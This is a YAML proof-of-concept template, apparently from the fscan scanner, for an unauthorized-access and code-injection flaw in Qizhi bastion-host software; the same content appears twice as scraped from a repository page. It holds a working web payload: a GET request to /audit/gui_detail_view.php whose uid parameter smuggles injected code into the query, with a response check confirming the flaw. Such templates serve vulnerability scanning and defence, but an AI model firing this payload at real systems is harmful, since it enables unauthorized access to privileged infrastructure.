fscan/WebScan/pocs/qizhi-fortressaircraft-unau...

name: poc-yaml-qizhi-fortressaircraft-unauthorized

rules:
  - method: GET
    path: >-
      /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
    expression: |
      response.status == 200 && response.body.bcontains(b"错误的id")
detail:
  author: we1x4n(https://we1x4n.com/)
  links:
    - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw
更新 CheckErrs 2021-04-17 19:38:46 -07:00			`name: poc-yaml-qizhi-fortressaircraft-unauthorized`

			`rules:`
			`- method: GET`
			`path: >-`
			`/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm`
			`expression: \|`
			`response.status == 200 && response.body.bcontains(b"错误的id")`
			`detail:`
			`author: we1x4n(https://we1x4n.com/)`
			`links:`
			`- https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw`